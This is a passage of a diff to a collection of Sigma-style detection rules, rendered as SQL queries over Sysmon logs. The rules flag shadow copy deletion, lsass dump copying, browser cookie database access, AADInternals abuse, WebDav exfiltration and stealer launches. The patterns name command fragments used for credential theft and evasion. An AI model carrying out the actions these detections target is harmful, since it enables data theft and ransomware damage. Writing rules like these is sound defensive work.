ESCAPE '\\' OR CommandLine LIKE '% /x%' ESCAPE '\\' OR CommandLine LIKE '% -s%' ESCAPE '\\' OR CommandLine LIKE '% /s%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% /c%' ESCAPE '\\' OR CommandLine LIKE '% -g%' ESCAPE '\\' OR CommandLine LIKE '% /g%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND (CommandLine LIKE '%.bmp' ESCAPE '\\' OR CommandLine LIKE '%.cr2' ESCAPE '\\' OR CommandLine LIKE '%.eps' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.ico' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.nef' ESCAPE '\\' OR CommandLine LIKE '%.orf' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.raw' ESCAPE '\\' OR CommandLine LIKE '%.sr2' ESCAPE '\\' OR CommandLine LIKE '%.tif' ESCAPE '\\' OR CommandLine LIKE '%.tiff' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psloglist.yml" + "filename": "proc_creation_win_regsvr32_image.yml" }, { - "title": "Email Exifiltration Via Powershell", - "id": "312d0384-401c-4b8b-abdf-685ffba9a332", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", + "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", "status": "experimental", - "description": "Detects email exfiltration via powershell cmdlets", - "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.exfiltration" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_email_exfil.yml" + "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" }, { - "title": "Imports Registry Key From an ADS", - "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", + "title": "Potential Procdump Evasion", + "id": "79b06761-465f-4f88-9ef2-150e24d3d737", "status": "test", - "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", + "author": 
"Florian Roth (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Cases in which procdump just gets copied to a different directory without any renaming" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regedit_import_keys_ads.yml" + "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" }, { - "title": "Bypass UAC via CMSTP", - "id": "e66779cc-383e-4224-a3a4-267eeb585c40", - "status": "test", - "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", + "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", + "status": "experimental", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002", - "attack.t1218.003" + "attack.execution", + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ], "falsepositives": [ - "Legitimate use of cmstp.exe utility by legitimate user" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE 
'%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_cmstp.yml" + "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" }, { - "title": "Renamed NetSupport RAT Execution", - "id": "0afbd410-de03-4078-8491-f132303cb67d", + "title": "Renamed Vmnat.exe Execution", + "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", "status": "experimental", - "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", + "author": "elhoim", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\client32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'vmnat.exe' AND NOT ((Image LIKE 
'%vmnat.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_netsupport_rat.yml" + "filename": "proc_creation_win_renamed_vmnat.yml" }, { - "title": "Windows Admin Share Mount Via Net.EXE", - "id": "3abd6094-7027-475f-9630-8ab9be7b9725", - "status": "test", - "description": "Detects when an admin share is mounted using net.exe", - "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", + "title": "Suspicious Add Scheduled Task Parent", + "id": "9494479d-d994-40bf-a8b1-eea890237021", + "status": "experimental", + "description": "Detects suspicious scheduled task creations from a parent stored in a temporary folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Administrators" + "Software installers that run from temporary folders and also install scheduled tasks" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '% \\\\%\\\\%$%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%unattended.ini%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_net_use_mount_admin_share.yml" + "filename": "proc_creation_win_schtasks_parent.yml" }, { 
- "title": "Sensitive Registry Access via Volume Shadow Copy", - "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", - "status": "experimental", - "description": "Detects a command that accesses password storing registry hives via volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "Suspicious RazerInstaller Explorer Subprocess", + "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "status": "test", + "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", "tags": [ - "attack.impact", - "attack.t1490" + "attack.privilege_escalation", + "attack.t1553" ], "falsepositives": [ - "Some rare backup scenarios" + "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (Image LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" + }, + { + "title": "Potential Commandline Obfuscation Using Unicode Characters", + "id": "e0552b19-5a83-4222-b141-b36184bb8d79", + "status": "test", + "description": "Detects potential commandline 
obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", + "author": "frack113, Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti_shadowcopy.yml" + "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" }, { - "title": "Exchange PowerShell Snap-Ins Usage", - "id": "25676e10-2121-446e-80a4-71ff8506af47", + "title": "Suspicious WebDav Client Execution", + "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", "status": "experimental", - "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", - "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. 
This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.collection", - "attack.t1114" + "attack.exfiltration", + "attack.t1048.003", + "cve.2023.23397" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-s WebClient%' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR 
CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_snapins_hafnium.yml" + "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" }, { - "title": "Winword LOLBIN Usage", - "id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", + "title": "New Generic Credentials Added Via Cmdkey.EXE", + "id": "b1ec66c6-f4d1-4b5c-96dd-af28ccae7727", "status": "experimental", - "description": "Detects Winword process loading custmom dlls via the '/l' switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Victor Sergeev, oscd.community", + "description": "Detects usage of cmdkey to add generic credentials. 
As an example, this has to be used before connecting to an RDP session via command line interface.", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.credential_access", + "attack.t1003.005" ], "falsepositives": [ - "Unknown" + "Legitimate usage for administration purposes" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR OriginalFileName = 'WinWord.exe') AND (CommandLine LIKE '%/l %' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /g%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_winword.yml" + "filename": "proc_creation_win_cmdkey_adding_generic_creds.yml" }, { - "title": "Suspicious Greedy Compression Using Rar.EXE", - "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", + "title": "PUA - NirCmd Execution", + "id": "4e2ed651-1906-4a59-a78a-18220fca1b22", "status": "experimental", - "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", - "author": "X__Junior, Florian Roth", + "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate 
use by administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\NirCmd.exe' ESCAPE '\\' OR OriginalFileName = 'NirCmd.exe' OR (CommandLine LIKE '% execmd %' ESCAPE '\\' OR CommandLine LIKE '%.exe script %' ESCAPE '\\' OR CommandLine LIKE '%.exe shexec %' ESCAPE '\\' OR CommandLine LIKE '% runinteractive %' ESCAPE '\\')) OR ((CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% exec2 %' ESCAPE '\\') AND (CommandLine LIKE '% show %' ESCAPE '\\' OR CommandLine LIKE '% hide %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_rar_susp_greedy_compression.yml" + "filename": "proc_creation_win_pua_nircmd.yml" }, { - "title": "Hiding Files with Attrib.exe", - "id": "4281cb20-2994-4580-aa63-c8b86d019934", - "status": "test", - "description": "Detects usage of attrib.exe to hide files from users.", - "author": "Sami Ruohonen", + "title": "Rhadamanthys Stealer Module Launch Via Rundll32.EXE", + "id": "5cdbc2e8-86dd-43df-9a1a-200d4745fba5", + "status": "experimental", + "description": "Detects the use of Rundll32 to launch an NSIS module that serves as the 
main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023", + "author": "TropChaud", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1218.011" ], "falsepositives": [ - "IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)", - "Msiexec.exe hiding desktop.ini" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +h %' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\desktop.ini %' ESCAPE '\\') OR (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '+R +H +S +A \\\\\\*.cui' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\\\*.bat' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'RUNDLL32.EXE' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\') AND CommandLine LIKE '%nsis\\_uns%' ESCAPE '\\' AND CommandLine LIKE '%PrintUIEntry%' ESCAPE '\\')" ], - "filename": "proc_creation_win_attrib_hiding_files.yml" + "filename": "proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml" }, { - "title": "User Discovery And Export Via Get-ADUser Cmdlet", - "id": "1114e048-b69c-4f41-bc20-657245ae6e3f", + "title": "SQLite Firefox Profile Data DB Access", + "id": "4833155a-4053-4c9c-a997-777fcea0baa7", "status": "experimental", - "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1033" + 
"attack.credential_access", + "attack.t1539", + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADUser %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_user_discovery_get_aduser.yml" + "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" }, { - "title": "Suspicious Compression Tool Parameters", - "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", - "status": "test", - "description": "Detects suspicious command line arguments of common data compression tools", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "title": "Suspicious File Download via CertOC.exe", + "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", + "status": "experimental", + "description": "Detects when a user downloads file by using CertOC.exe", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + 
"attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentImage LIKE 'C:\\\\Program%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_compression_params.yml" + "filename": "proc_creation_win_lolbin_certoc_download.yml" }, { - "title": "Rundll32 Registered COM Objects", - "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", + "title": "Potential BlackByte Ransomware Activity", + "id": "999e8307-a775-4d5f-addc-4855632335be", "status": "test", - "description": "load malicious registered COM objects", - "author": 